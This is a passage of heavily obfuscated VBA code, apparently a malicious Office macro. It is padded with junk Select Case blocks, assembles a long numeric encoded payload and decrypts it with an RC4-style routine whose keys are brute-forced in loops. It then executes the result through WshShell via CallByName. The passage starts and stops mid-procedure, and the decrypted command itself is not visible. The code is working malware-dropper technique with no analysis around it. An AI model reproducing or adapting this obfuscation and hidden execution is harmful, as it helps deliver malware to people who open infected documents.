End Select
W5l = W5l & "1&23934&12772&-24034&-11914&22021&22875&-9773&22457&-14432&-12673&17600&-24741&-24374&23639&-25438&31193&-12938&-14722&-19983&-22775&20492&4744&9219&-29975&-6032&-28636&-12950&-16910&12494&-27316&-23918&1259&-23835&-21856&-21201&-24452&15906&31990&-27070&-606&30224&14196&-9849&-14441&4859&12957&-4885&-19118&-9737&-5617&6676&-12447&-20694&16633&11819&-1010&5620&-25220&15696&10418&8600&-25404&4794&15637&-21191&704&31042&-27922&9385&-3121&-3038&12212&-14479&-17009&-23858&21717&-15043&27999&2124&4225&-20385&-12964&-10574&19404&-23532&207&22693&1079&20830&-22425&-28157&-29240&9516&20321&30163&29677&2611&20629&23016&31519&26785&-9331&8220&1849&16639&16918&-31564&9910&-17633&-32241&5728&26293&-25586&29087&-8716&-1907&21230&-12371&-2648&-7154&23094&-32371&4577&23940&-25446&-10616&30948&1105"
NcEgv5 = 69
Select Case NcEgv5
Case 59
NcEgv5 = NcEgv5 + 1
Case 17
NcEgv5 = NcEgv5 + NcEgv5
Case Else
NcEgv5 = NcEgv5 - 1
End Select
W5l = W5l & "6&-2278&-7055&-15393&-14871&23157&19822&23735&17652&32263&-15898&-23933&7857&1394&29884&-14412&30159&-20966&11670&281&-10467&-28619&-5080&-19484&3236&-26179&32186&-3192&1638&25836&7835&-18823&-21212&-8231&-25295&3085&16044&31505&-20729&29723&-11753&-13808&-24378&18615&5453&-11669&7413&-22753&2914&-9457&-23211&-9527&23145&-25949&14151&12692&-14416&-7842&17894&-1010&-29952&3451&-9273&7741&-22607&9704&17952&2831&-24760&13601&-4963&9335&13390&9477&-22672&28826&-8864&-2071&-21889&24908&-2306&-13630&-14645&24798&-723&1184&12436&-21716&10484&-13787&-1184&28649&-16844&2821&-6141&12270&-19867&-27251&2348&16066&-21157&22694&3847&31094&-21419&31139&26444&16144&-9360&28282&30464&-26438&-28158&18066&16607&-6849&-27884&31765&20648&784&-6891&-16346&-10214&3609&-600&31582&14793&-9817&23929&-8447&32"
JvaWope = 79
Select Case JvaWope
Case 58
JvaWope = JvaWope + 1
Case 20
JvaWope = JvaWope + JvaWope
Case Else
JvaWope = JvaWope - 1
End Select
W5l = W5l & "536&-12816&-13315&-28937&-16245&-1560&-3532&14021&23395&10188&28489&31619&-5032&-11593&5805&30334&30600&15516&20633&-15762&-26651&19608&-26257&-17088&-27204&-17231&-5553&15674&-27506&7987&32298&-8903&-3090&-32085&-14119&-17786&-20128&10004&-6626&-24513&-29301&11595&21607&-4114&-3800&-30496&13803&-31755&23191&-24077&-14960&168&-14236&-29350&-29943&24056&-14216&16451&22600&24276&17859&-2158&-23267&787&-26002&-30943&-32368&22469&10301&-26908&17198&30382&-1626&-26863&17336&16767&-14056&-12186&19777&-4004&-6030&9306&-6036&-29987&-25124&3058&2574&-27061&-5045&15489&-18735&-20275&-3235&5196&15186&-2899&15629&9766&-22180&-234&16651&22304&20932&25591&-16023&-19274&-7624&-2234&4241&-28508&19587&-18215&7712&5490&-9146&-32376&17488&2749&-16489&3203&-22592&-5881&1352&-9033&17761&5885&-32163&-768"
JDPHu = 83
Select Case JDPHu
Case 31
JDPHu = JDPHu + 1
Case 60
JDPHu = JDPHu + JDPHu
Case Else
JDPHu = JDPHu - 1
End Select
W5l = W5l & "8&8399&-28755&-13993&22502&16563&-6773&18740&-23273&-2067&26264&-19605&-17411&-6806&5090&6033&-23553&15374&1860&-10561&-27104&-22924&-31082&-6386&12631&-24082&15956&8264&27074&13333&-31430&1979&23825&23667&-1872&865&23080&-6449&16222&2966&18600&-18053&-13085&21482&28693&32012&21637&-25131&16034&25204&-5929&-29178&-20867&-31469&8535&22805&10851&27845&27466&1091&-18297&-4878&17156&27888&30364&4048&20286&18699&-18464&26485&27783&17580&-8426&29479&9848&4705&-18339&-16472&18842&11931&9794&-16615&3337&-4119&-14063&2555&-16585&26865&23336&-14938&-29594&11907&-2660&-387&-15725&-11283&9265&-4726&-20145&-26433&-3196&30868&31559&-12650&21714&13804&-9655&-26651&18471&22397&25868&-31730&22194&20782&-23461&-4149&-25794&23563&-21740&-27877&-21992&20&17698&17432&23262&-10935&1358&-21050&5673&-16837"
J1gyQ = 78
Select Case J1gyQ
Case 47
J1gyQ = J1gyQ + 1
Case 13
J1gyQ = J1gyQ + J1gyQ
Case Else
J1gyQ = J1gyQ - 1
End Select
W5l = W5l & "&14561&18787&20718&-1520&-1732&2089&3508&-9047&32120&-12703&27360&-17081&-1686&-4037&-15834&8191&-9226&23273&-7591&25169&26705&1413&11851&-7108&7223&-476&19358&30931&-667&-31224&-4337&23186&1967&11151&-5569&12191&-21282&24919&1337&24522&-28187&-3745&25478&25767&-15785&-19493&-752&32325&-6496&19099&2653&-27253&-13148&-19524&5627&-27101&-28825&-23695&-10170&-23929&12770&-5556&-12127&7982&7656&-17884&-11875&583&-1486&-2440&-19683&6446&11301&-4748&-18071&-19319&-11481&1603&17287&7479&9372&-29561&-32101&22480&13258&-4244&6187&-20913&16981&12018&-11157&-2475&-5955&-6082&-31371&19852&-29146&32268&-24579&29855&24948&12565&-26728&14956&20446&-30997&24720&9243&-30458&26320&-10195&-28525&-22534&23705&-16749&-29561&13455&8556&9627&19179&-16538&-22026&27477&3055&-9608&-8745&22457&17476&12821&327"
TK9R9Y = 91
Select Case TK9R9Y
Case 91
TK9R9Y = TK9R9Y + 1
Case 66
TK9R9Y = TK9R9Y + TK9R9Y
Case Else
TK9R9Y = TK9R9Y - 1
End Select
W5l = W5l & "50&-18529&46"
Ogl = 82
Select Case Ogl
Case 74
Ogl = Ogl + 1
Case 96
Ogl = Ogl + Ogl
Case Else
Ogl = Ogl - 1
End Select
Dim VXm() As String, L0Gtop As Integer
UoN = 97
Select Case UoN
Case 87
UoN = UoN + 1
Case 44
UoN = UoN + UoN
Case Else
UoN = UoN - 1
End Select
VXm = Split(W5l, W55F((791 - 753)))
UsVan = 47
Select Case UsVan
Case 38
UsVan = UsVan + 1
Case 39
UsVan = UsVan + UsVan
Case Else
UsVan = UsVan - 1
End Select
ReDim EFJ(2057)
ICLqZ0 = 27
Select Case ICLqZ0
Case 85
ICLqZ0 = ICLqZ0 + 1
Case 37
ICLqZ0 = ICLqZ0 + ICLqZ0
Case Else
ICLqZ0 = ICLqZ0 - 1
End Select
For L0Gtop = 0 To 2057
EFJ(L0Gtop) = VXm(L0Gtop)
Next L0Gtop
Dim W5nx As String, CSTjKto As Long, FFnkG6 As String, FoC As String, NkqjQX As String, OO1eru As String, MAgmyhc As String, J8 As String, A18jH() As Byte
AdWe = 97
Select Case AdWe
Case 83
AdWe = AdWe + 1
Case 53
AdWe = AdWe + AdWe
Case Else
AdWe = AdWe - 1
End Select
Muu = 84
Select Case Muu
Case 77
Muu = Muu + 1
Case 45
Muu = Muu + Muu
Case Else
Muu = Muu - 1
End Select
Dim U5E33(14) As Byte, NQJQ(33) As Byte
LkHo2 = 97
Select Case LkHo2
Case 51
LkHo2 = LkHo2 + 1
Case 89
LkHo2 = LkHo2 + LkHo2
Case Else
LkHo2 = LkHo2 - 1
End Select
U5E33(0) = 206
U5E33(1) = 116
U5E33(2) = 12
U5E33(3) = 230
U5E33(4) = 217
U5E33(5) = 82
U5E33(6) = 103
U5E33(7) = 126
U5E33(8) = 118
U5E33(9) = 17
U5E33(10) = 166
U5E33(11) = 182
U5E33(12) = 139
U5E33(13) = 52
U5E33(14) = 195
F583nt = 61
Select Case F583nt
Case 8
F583nt = F583nt + 1
Case 20
F583nt = F583nt + F583nt
Case Else
F583nt = F583nt - 1
End Select
NQJQ(0) = 68
NQJQ(1) = 68
NQJQ(2) = 66
NQJQ(3) = 66
NQJQ(4) = 113
NQJQ(5) = 86
NQJQ(6) = 86
NQJQ(7) = 110
NQJQ(8) = 68
NQJQ(9) = 122
NQJQ(10) = 109
NQJQ(11) = 75
NQJQ(12) = 97
NQJQ(13) = 113
RgBVGF = 81
Select Case RgBVGF
Case 85
RgBVGF = RgBVGF + 1
Case 48
RgBVGF = RgBVGF + RgBVGF
Case Else
RgBVGF = RgBVGF - 1
End Select
For CSTjKto = IKJ(UHxM) To IKJ(B1D)
NQJQ(14) = V9rjJ(CSTjKto, 1)
NQJQ(15) = V9rjJ(CSTjKto, 2)
NQJQ(16) = V9rjJ(CSTjKto, 3)
NQJQ(17) = V9rjJ(CSTjKto, 4)
NQJQ(18) = NQJQ(14)
NQJQ(19) = NQJQ(15)
NQJQ(20) = NQJQ(16)
NQJQ(21) = NQJQ(17)
NQJQ(22) = NQJQ(14)
NQJQ(23) = NQJQ(15)
NQJQ(24) = NQJQ(16)
NQJQ(25) = NQJQ(17)
NQJQ(26) = NQJQ(14)
NQJQ(27) = NQJQ(15)
NQJQ(28) = NQJQ(16)
NQJQ(29) = NQJQ(17)
NQJQ(30) = NQJQ(14)
NQJQ(31) = NQJQ(15)
NQJQ(32) = NQJQ(16)
NQJQ(33) = NQJQ(17)
If CBNIP8i(U5E33, NQJQ) = "FmL8JG0uNeJBLI8" Then Exit For
Next CSTjKto
WVCti1 = 67
Select Case WVCti1
Case 81
WVCti1 = WVCti1 + 1
Case 13
WVCti1 = WVCti1 + WVCti1
Case Else
WVCti1 = WVCti1 - 1
End Select
Dim B7kc9qn(10) As Byte, JA7sVq(34) As Byte
Wq0t = 47
Select Case Wq0t
Case 29
Wq0t = Wq0t + 1
Case 55
Wq0t = Wq0t + Wq0t
Case Else
Wq0t = Wq0t - 1
End Select
B7kc9qn(0) = 10
B7kc9qn(1) = 4
B7kc9qn(2) = 66
B7kc9qn(3) = 181
B7kc9qn(4) = 158
B7kc9qn(5) = 152
B7kc9qn(6) = 170
B7kc9qn(7) = 157
B7kc9qn(8) = 209
B7kc9qn(9) = 215
B7kc9qn(10) = 153
D3UZA7 = 1
Select Case D3UZA7
Case 27
D3UZA7 = D3UZA7 + 1
Case 2
D3UZA7 = D3UZA7 + D3UZA7
Case Else
D3UZA7 = D3UZA7 - 1
End Select
JA7sVq(0) = 76
JA7sVq(1) = 115
JA7sVq(2) = 82
JA7sVq(3) = 67
JA7sVq(4) = 84
JA7sVq(5) = 57
JA7sVq(6) = 98
JA7sVq(7) = 65
JA7sVq(8) = 75
JA7sVq(9) = 76
JA7sVq(10) = 105
JA7sVq(11) = 69
JA7sVq(12) = 66
JA7sVq(13) = 48
JA7sVq(14) = 119
M8i = 33
Select Case M8i
Case 55
M8i = M8i + 1
Case 43
M8i = M8i + M8i
Case Else
M8i = M8i - 1
End Select
For CSTjKto = IKJ(UHxM) To IKJ(B1D)
JA7sVq(15) = V9rjJ(CSTjKto, 1)
JA7sVq(16) = V9rjJ(CSTjKto, 2)
JA7sVq(17) = V9rjJ(CSTjKto, 3)
JA7sVq(18) = V9rjJ(CSTjKto, 4)
JA7sVq(19) = JA7sVq(15)
JA7sVq(20) = JA7sVq(16)
JA7sVq(21) = JA7sVq(17)
JA7sVq(22) = JA7sVq(18)
JA7sVq(23) = JA7sVq(15)
JA7sVq(24) = JA7sVq(16)
JA7sVq(25) = JA7sVq(17)
JA7sVq(26) = JA7sVq(18)
JA7sVq(27) = JA7sVq(15)
JA7sVq(28) = JA7sVq(16)
JA7sVq(29) = JA7sVq(17)
JA7sVq(30) = JA7sVq(18)
JA7sVq(31) = JA7sVq(15)
JA7sVq(32) = JA7sVq(16)
JA7sVq(33) = JA7sVq(17)
JA7sVq(34) = JA7sVq(18)
If CBNIP8i(B7kc9qn, JA7sVq) = "EJPE91dEKtX" Then Exit For
Next CSTjKto
MPgZ = 75
Select Case MPgZ
Case 67
MPgZ = MPgZ + 1
Case 90
MPgZ = MPgZ + MPgZ
Case Else
MPgZ = MPgZ - 1
End Select
Dim D4MCa(18) As Byte, PifGY(40) As Byte
BFvZEOj = 89
Select Case BFvZEOj
Case 26
BFvZEOj = BFvZEOj + 1
Case 15
BFvZEOj = BFvZEOj + BFvZEOj
Case Else
BFvZEOj = BFvZEOj - 1
End Select
D4MCa(0) = 53
D4MCa(1) = 202
D4MCa(2) = 110
D4MCa(3) = 210
D4MCa(4) = 70
D4MCa(5) = 204
D4MCa(6) = 99
D4MCa(7) = 90
D4MCa(8) = 207
D4MCa(9) = 60
D4MCa(10) = 220
D4MCa(11) = 104
D4MCa(12) = 122
D4MCa(13) = 55
D4MCa(14) = 76
D4MCa(15) = 18
D4MCa(16) = 102
D4MCa(17) = 87
D4MCa(18) = 177
Q85 = 58
Select Case Q85
Case 59
Q85 = Q85 + 1
Case 56
Q85 = Q85 + Q85
Case Else
Q85 = Q85 - 1
End Select
PifGY(0) = 89
PifGY(1) = 66
PifGY(2) = 82
PifGY(3) = 85
PifGY(4) = 117
PifGY(5) = 54
PifGY(6) = 97
PifGY(7) = 79
PifGY(8) = 54
PifGY(9) = 82
PifGY(10) = 103
PifGY(11) = 56
PifGY(12) = 85
PifGY(13) = 103
PifGY(14) = 68
PifGY(15) = 49
PifGY(16) = 83
PifGY(17) = 115
PifGY(18) = 77
PifGY(19) = 115
PifGY(20) = 108
Vv3tU = 40
Select Case Vv3tU
Case 45
Vv3tU = Vv3tU + 1
Case 29
Vv3tU = Vv3tU + Vv3tU
Case Else
Vv3tU = Vv3tU - 1
End Select
For CSTjKto = IKJ(UHxM) To IKJ(B1D)
PifGY(21) = V9rjJ(CSTjKto, 1)
PifGY(22) = V9rjJ(CSTjKto, 2)
PifGY(23) = V9rjJ(CSTjKto, 3)
PifGY(24) = V9rjJ(CSTjKto, 4)
PifGY(25) = PifGY(21)
PifGY(26) = PifGY(22)
PifGY(27) = PifGY(23)
PifGY(28) = PifGY(24)
PifGY(29) = PifGY(21)
PifGY(30) = PifGY(22)
PifGY(31) = PifGY(23)
PifGY(32) = PifGY(24)
PifGY(33) = PifGY(21)
PifGY(34) = PifGY(22)
PifGY(35) = PifGY(23)
PifGY(36) = PifGY(24)
PifGY(37) = PifGY(21)
PifGY(38) = PifGY(22)
PifGY(39) = PifGY(23)
PifGY(40) = PifGY(24)
If CBNIP8i(D4MCa, PifGY) = "MCXTDIa55V6CEU5HjUH" Then Exit For
Next CSTjKto
U0 = 66
Select Case U0
Case 92
U0 = U0 + 1
Case 13
U0 = U0 + U0
Case Else
U0 = U0 - 1
End Select
Dim Sbvlq5(12) As Byte, NaB3t(27) As Byte
Ww4X0f = 6
Select Case Ww4X0f
Case 60
Ww4X0f = Ww4X0f + 1
Case 24
Ww4X0f = Ww4X0f + Ww4X0f
Case Else
Ww4X0f = Ww4X0f - 1
End Select
Sbvlq5(0) = 127
Sbvlq5(1) = 219
Sbvlq5(2) = 17
Sbvlq5(3) = 83
Sbvlq5(4) = 221
Sbvlq5(5) = 171
Sbvlq5(6) = 91
Sbvlq5(7) = 237
Sbvlq5(8) = 246
Sbvlq5(9) = 67
Sbvlq5(10) = 249
Sbvlq5(11) = 7
Sbvlq5(12) = 168
TZwVVNI = 83
Select Case TZwVVNI
Case 27
TZwVVNI = TZwVVNI + 1
Case 95
TZwVVNI = TZwVVNI + TZwVVNI
Case Else
TZwVVNI = TZwVVNI - 1
End Select
NaB3t(0) = 85
NaB3t(1) = 80
NaB3t(2) = 71
NaB3t(3) = 52
NaB3t(4) = 118
NaB3t(5) = 54
NaB3t(6) = 75
NaB3t(7) = 75
D1W = 5
Select Case D1W
Case 28
D1W = D1W + 1
Case 60
D1W = D1W + D1W
Case Else
D1W = D1W - 1
End Select
For CSTjKto = IKJ(UHxM) To IKJ(B1D)
NaB3t(8) = V9rjJ(CSTjKto, 1)
NaB3t(9) = V9rjJ(CSTjKto, 2)
NaB3t(10) = V9rjJ(CSTjKto, 3)
NaB3t(11) = V9rjJ(CSTjKto, 4)
NaB3t(12) = NaB3t(8)
NaB3t(13) = NaB3t(9)
NaB3t(14) = NaB3t(10)
NaB3t(15) = NaB3t(11)
NaB3t(16) = NaB3t(8)
NaB3t(17) = NaB3t(9)
NaB3t(18) = NaB3t(10)
NaB3t(19) = NaB3t(11)
NaB3t(20) = NaB3t(8)
NaB3t(21) = NaB3t(9)
NaB3t(22) = NaB3t(10)
NaB3t(23) = NaB3t(11)
NaB3t(24) = NaB3t(8)
NaB3t(25) = NaB3t(9)
NaB3t(26) = NaB3t(10)
NaB3t(27) = NaB3t(11)
If CBNIP8i(Sbvlq5, NaB3t) = "RGmZ3B5hyC5DD" Then Exit For
Next CSTjKto
Qc = 28
Select Case Qc
Case 18
Qc = Qc + 1
Case 74
Qc = Qc + Qc
Case Else
Qc = Qc - 1
End Select
TYq5 = 95
Select Case TYq5
Case 96
TYq5 = TYq5 + 1
Case 93
TYq5 = TYq5 + TYq5
Case Else
TYq5 = TYq5 - 1
End Select
Dim Kik As Long, DU As Long, CPQ As Long, B1y As Long, JwdCYW(4118) As Byte, BHiaA As Long, NUP As String
AJxUR5 = 17
Select Case AJxUR5
Case 65
AJxUR5 = AJxUR5 + 1
Case 21
AJxUR5 = AJxUR5 + AJxUR5
Case Else
AJxUR5 = AJxUR5 - 1
End Select
For Kik = 0 To IKJ(EFJ)
LVi = 20
Select Case LVi
Case 95
LVi = LVi + 1
Case 69
LVi = LVi + LVi
Case Else
LVi = LVi - 1
End Select
For DU = 1 To 2
Yj2KM = 10
Select Case Yj2KM
Case 52
Yj2KM = Yj2KM + 1
Case 98
Yj2KM = Yj2KM + Yj2KM
Case Else
Yj2KM = Yj2KM - 1
End Select
If CPQ = 1 Then
Kbp4HiJ = 72
Select Case Kbp4HiJ
Case 76
Kbp4HiJ = Kbp4HiJ + 1
Case 39
Kbp4HiJ = Kbp4HiJ + Kbp4HiJ
Case Else
Kbp4HiJ = Kbp4HiJ - 1
End Select
JwdCYW(B1y) = FXZ1Aht(EFJ(BHiaA))(CPQ)
VA1p = 67
Select Case VA1p
Case 64
VA1p = VA1p + 1
Case 74
VA1p = VA1p + VA1p
Case Else
VA1p = VA1p - 1
End Select
Else
Xl2SC = 39
Select Case Xl2SC
Case 87
Xl2SC = Xl2SC + 1
Case 17
Xl2SC = Xl2SC + Xl2SC
Case Else
Xl2SC = Xl2SC - 1
End Select
CPQ = 0
EK0wq = 52
Select Case EK0wq
Case 91
EK0wq = EK0wq + 1
Case 47
EK0wq = EK0wq + EK0wq
Case Else
EK0wq = EK0wq - 1
End Select
JwdCYW(B1y) = FXZ1Aht(EFJ(BHiaA))(CPQ)
WMpTt = 93
Select Case WMpTt
Case 40
WMpTt = WMpTt + 1
Case 74
WMpTt = WMpTt + WMpTt
Case Else
WMpTt = WMpTt - 1
End Select
End If
AuB = 43
Select Case AuB
Case 78
AuB = AuB + 1
Case 72
AuB = AuB + AuB
Case Else
AuB = AuB - 1
End Select
B1y = B1y + 1
J7kYZxL = 90
Select Case J7kYZxL
Case 38
J7kYZxL = J7kYZxL + 1
Case 23
J7kYZxL = J7kYZxL + J7kYZxL
Case Else
J7kYZxL = J7kYZxL - 1
End Select
CPQ = CPQ + 1
Kd = 54
Select Case Kd
Case 11
Kd = Kd + 1
Case 15
Kd = Kd + Kd
Case Else
Kd = Kd - 1
End Select
Next DU
I3t1AqO = 62
Select Case I3t1AqO
Case 74
I3t1AqO = I3t1AqO + 1
Case 11
I3t1AqO = I3t1AqO + I3t1AqO
Case Else
I3t1AqO = I3t1AqO - 1
End Select
BHiaA = BHiaA + 1
LN6YJs4 = 55
Select Case LN6YJs4
Case 68
LN6YJs4 = LN6YJs4 + 1
Case 27
LN6YJs4 = LN6YJs4 + LN6YJs4
Case Else
LN6YJs4 = LN6YJs4 - 1
End Select
Next Kik
QjeFk = 1
Select Case QjeFk
Case 70
QjeFk = QjeFk + 1
Case 35
QjeFk = QjeFk + QjeFk
Case Else
QjeFk = QjeFk - 1
End Select
Dim G8p(137) As Byte, SaP As Long, EL5U344 As Long
WOZs8o = 83
Select Case WOZs8o
Case 22
WOZs8o = WOZs8o + 1
Case 81
WOZs8o = WOZs8o + WOZs8o
Case Else
WOZs8o = WOZs8o - 1
End Select
SaP = 0
J5Uzpy = 43
Select Case J5Uzpy
Case 31
J5Uzpy = J5Uzpy + 1
Case 66
J5Uzpy = J5Uzpy + J5Uzpy
Case Else
J5Uzpy = J5Uzpy - 1
End Select
EL5U344 = 0
Cy7P1 = 80
Select Case Cy7P1
Case 56
Cy7P1 = Cy7P1 + 1
Case 74
Cy7P1 = Cy7P1 + Cy7P1
Case Else
Cy7P1 = Cy7P1 - 1
End Select
For CSTjKto = 0 To IKJ(NQJQ)
G8p(CSTjKto) = NQJQ(CSTjKto)
SaP = SaP + 1
Next CSTjKto
XQ = 59
Select Case XQ
Case 68
XQ = XQ + 1
Case 39
XQ = XQ + XQ
Case Else
XQ = XQ - 1
End Select
For CSTjKto = IKJ(NQJQ) + 1 To IKJ(JA7sVq) + SaP
G8p(CSTjKto) = JA7sVq(EL5U344)
EL5U344 = EL5U344 + 1
SaP = SaP + 1
Next CSTjKto
BAlOimK = 53
Select Case BAlOimK
Case 24
BAlOimK = BAlOimK + 1
Case 11
BAlOimK = BAlOimK + BAlOimK
Case Else
BAlOimK = BAlOimK - 1
End Select
EL5U344 = 0
QIzX = 81
Select Case QIzX
Case 65
QIzX = QIzX + 1
Case 14
QIzX = QIzX + QIzX
Case Else
QIzX = QIzX - 1
End Select
For CSTjKto = SaP To IKJ(PifGY) + SaP
G8p(CSTjKto) = PifGY(EL5U344)
EL5U344 = EL5U344 + 1
SaP = SaP + 1
Next CSTjKto
VYuI = 8
Select Case VYuI
Case 1
VYuI = VYuI + 1
Case 67
VYuI = VYuI + VYuI
Case Else
VYuI = VYuI - 1
End Select
EL5U344 = 0
UI8KI = 72
Select Case UI8KI
Case 19
UI8KI = UI8KI + 1
Case 53
UI8KI = UI8KI + UI8KI
Case Else
UI8KI = UI8KI - 1
End Select
For CSTjKto = SaP To IKJ(NaB3t) + SaP
G8p(CSTjKto) = NaB3t(EL5U344)
EL5U344 = EL5U344 + 1
SaP = SaP + 1
Next CSTjKto
Uax5 = 42
Select Case Uax5
Case 35
Uax5 = Uax5 + 1
Case 57
Uax5 = Uax5 + Uax5
Case Else
Uax5 = Uax5 - 1
End Select
A18jH = JwdCYW
SeCC = 1
Select Case SeCC
Case 92
SeCC = SeCC + 1
Case 16
SeCC = SeCC + SeCC
Case Else
SeCC = SeCC - 1
End Select
ReDim Preserve A18jH(4114)
Uia6 = 5
Select Case Uia6
Case 20
Uia6 = Uia6 + 1
Case 60
Uia6 = Uia6 + Uia6
Case Else
Uia6 = Uia6 - 1
End Select
NUP = CBNIP8i(A18jH, G8p)
Tpp6 = 11
Select Case Tpp6
Case 13
Tpp6 = Tpp6 + 1
Case 9
Tpp6 = Tpp6 + Tpp6
Case Else
Tpp6 = Tpp6 - 1
End Select
Yki9Y = 80
Select Case Yki9Y
Case 6
Yki9Y = Yki9Y + 1
Case 4
Yki9Y = Yki9Y + Yki9Y
Case Else
Yki9Y = Yki9Y - 1
End Select
GHc = 34
Select Case GHc
Case 82
GHc = GHc + 1
Case 83
GHc = GHc + GHc
Case Else
GHc = GHc - 1
End Select
Dim GaChQzo As New WshShell
YEAsLZ = 68
Select Case YEAsLZ
Case 20
YEAsLZ = YEAsLZ + 1
Case 37
YEAsLZ = YEAsLZ + YEAsLZ
Case Else
YEAsLZ = YEAsLZ - 1
End Select
Dim XhvD80(2) As Byte, UB5hI(10) As Byte
AYcBr = 18
Select Case AYcBr
Case 90
AYcBr = AYcBr + 1
Case 98
AYcBr = AYcBr + AYcBr
Case Else
AYcBr = AYcBr - 1
End Select
XhvD80(0) = 107
XhvD80(1) = 119
XhvD80(2) = 174
QRmhphT = 23
Select Case QRmhphT
Case 67
QRmhphT = QRmhphT + 1
Case 9
QRmhphT = QRmhphT + QRmhphT
Case Else
QRmhphT = QRmhphT - 1
End Select
UB5hI(0) = 68
UB5hI(1) = 54
UB5hI(2) = 109
UB5hI(3) = 48
UB5hI(4) = 67
UB5hI(5) = 107
UB5hI(6) = 113
UB5hI(7) = 119
UB5hI(8) = 98
UB5hI(9) = 69
UB5hI(10) = 67
CallByName GaChQzo, CBNIP8i(XhvD80, UB5hI), 3018 - 3017, NUP, 6995 - 6995, 2657 - 2657
WeMwUdh = 21
Select Case WeMwUdh
Case 33
WeMwUdh = WeMwUdh + 1
Case 70
WeMwUdh = WeMwUdh + WeMwUdh
Case Else
WeMwUdh = WeMwUdh - 1
End Select
End Sub
Private Function CBNIP8i(Gq() As Byte, CgB() As Byte) As String
Dmep3a = 67
Select Case Dmep3a
Case 80
Dmep3a = Dmep3a + 1
Case 39
Dmep3a = Dmep3a + Dmep3a
Case Else
Dmep3a = Dmep3a - 1
End Select
On Error Resume Next
Ta8TCjE = 38
Select Case Ta8TCjE
Case 22
Ta8TCjE = Ta8TCjE + 1
Case 69
Ta8TCjE = Ta8TCjE + Ta8TCjE
Case Else
Ta8TCjE = Ta8TCjE - 1
End Select
Dim Ock9y3(0 To 255) As Integer, FCmxt As Long, UzP As Long, Q7t As Long, LG14 As Byte, WVEm6() As Byte, BZTtv() As Byte
CaBIwx = 98
Select Case CaBIwx
Case 25
CaBIwx = CaBIwx + 1
Case 73
CaBIwx = CaBIwx + CaBIwx
Case Else
CaBIwx = CaBIwx - 1
End Select
ReDim WVEm6(IKJ(Gq)) As Byte
QlO = 84
Select Case QlO
Case 8
QlO = QlO + 1
Case 84
QlO = QlO + QlO
Case Else
QlO = QlO - 1
End Select
WVEm6 = Gq
Mlz = 89
Select Case Mlz
Case 50
Mlz = Mlz + 1
Case 67
Mlz = Mlz + Mlz
Case Else
Mlz = Mlz - 1
End Select
ReDim BZTtv(IKJ(CgB)) As Byte
R1CNthq = 51
Select Case R1CNthq
Case 64
R1CNthq = R1CNthq + 1
Case 78
R1CNthq = R1CNthq + R1CNthq
Case Else
R1CNthq = R1CNthq - 1
End Select
BZTtv = CgB
W2w4p6p = 51
Select Case W2w4p6p
Case 77
W2w4p6p = W2w4p6p + 1
Case 97
W2w4p6p = W2w4p6p + W2w4p6p
Case Else
W2w4p6p = W2w4p6p - 1
End Select
For FCmxt = 0 To (-4857 + 5112)
Ock9y3(FCmxt) = FCmxt
Next FCmxt
TG = 18
Select Case TG
Case 45
TG = TG + 1
Case 10
TG = TG + TG
Case Else
TG = TG - 1
End Select
FCmxt = 0
TY8LM2 = 39
Select Case TY8LM2
Case 80
TY8LM2 = TY8LM2 + 1
Case 28
TY8LM2 = TY8LM2 + TY8LM2
Case Else
TY8LM2 = TY8LM2 - 1
End Select
UzP = 0
X4j = 2
Select Case X4j
Case 5
X4j = X4j + 1
Case 67
X4j = X4j + X4j
Case Else
X4j = X4j - 1
End Select
Q7t = 0
UYa = 73
Select Case UYa
Case 74
UYa = UYa + 1
Case 71
UYa = UYa + UYa
Case Else
UYa = UYa - 1
End Select
For FCmxt = 0 To (619905 / 2431)
UzP = NUKOe((UzP + Ock9y3(FCmxt) + BZTtv(NUKOe(FCmxt, (IKJ(CgB) + 1)))), ((2471424 / 9654)))
LG14 = Ock9y3(FCmxt)
Ock9y3(FCmxt) = Ock9y3(UzP)
Ock9y3(UzP) = LG14
Next FCmxt
CGhP = 19
Select Case CGhP
Case 50
CGhP = CGhP + 1
Case 57
CGhP = CGhP + CGhP
Case Else
CGhP = CGhP - 1
End Select
FCmxt = 0
FhCp = 10
Select Case FhCp
Case 4
FhCp = FhCp + 1
Case 70
FhCp = FhCp + FhCp
Case Else
FhCp = FhCp - 1
End Select
UzP = 0
G5dSGye = 22
Select Case G5dSGye
Case 56
G5dSGye = G5dSGye + 1
Case 79
G5dSGye = G5dSGye + G5dSGye
Case Else
G5dSGye = G5dSGye - 1
End Select
Q7t = 0
QoH6hc = 89
Select Case QoH6hc
Case 91
QoH6hc = QoH6hc + 1
Case 10
QoH6hc = QoH6hc + QoH6hc
Case Else
QoH6hc = QoH6hc - 1
End Select
For FCmxt = 0 To IKJ(Gq)
UzP = NUKOe((UzP + 1), (9013 - 8757))
Q7t = NUKOe((Q7t + Ock9y3(UzP)), (-1451 + 1707))
LG14 = Ock9y3(UzP)
Ock9y3(UzP) = Ock9y3(Q7t)
Ock9y3(Q7t) = LG14
WVEm6(FCmxt) = RPSDiS(WVEm6(FCmxt), (Ock9y3(NUKOe((Ock9y3(UzP) + Ock9y3(Q7t)), ((754944 / 2949))))))
Next FCmxt
QVg3u = 60
Select Case QVg3u
Case 89
QVg3u = QVg3u + 1
Case 75
QVg3u = QVg3u + QVg3u
Case Else
QVg3u = QVg3u - 1
End Select
CBNIP8i = JGT5U(WVEm6)
QJxjQ = 80
Select Case QJxjQ
Case 76
QJxjQ = QJxjQ + 1
Case 42
QJxjQ = QJxjQ + QJxjQ
Case Else
QJxjQ = QJxjQ - 1
End Select
End Function
Private Function JGT5U(A7EBt() As Byte) As String
LPp2BpN = 26
Select Case LPp2BpN
Case 8
LPp2BpN = LPp2BpN + 1
Case 34
LPp2BpN = LPp2BpN + LPp2BpN
Case Else
LPp2BpN = LPp2BpN - 1
End Select
Dim PUw6 As Long
Ygu6L = 72
Select Case Ygu6L
Case 80
Ygu6L = Ygu6L + 1
Case 30
Ygu6L = Ygu6L + Ygu6L
Case Else
Ygu6L = Ygu6L - 1
End Select
For PUw6 = 0 To IKJ(A7EBt)
USo0 = 25
Select Case USo0
Case 68
USo0 = USo0 + 1
Case 37
USo0 = USo0 + USo0
Case Else
USo0 = USo0 - 1
End Select
JGT5U = JGT5U & W55F(A7EBt(PUw6))
SOf = 48
Select Case SOf
Case 66
SOf = SOf + 1
Case 12
SOf = SOf + SOf
Case Else
SOf = SOf - 1
End Select
Next PUw6
Ij46 = 83
Select Case Ij46
Case 72
Ij46 = Ij46 + 1
Case 52
Ij46 = Ij46 + Ij46
Case Else
Ij46 = Ij46 - 1
End Select
End Function
Private Sub NIg()
Ehh = 97
Select Case Ehh
Case 15
Ehh = Ehh + 1
Case 16
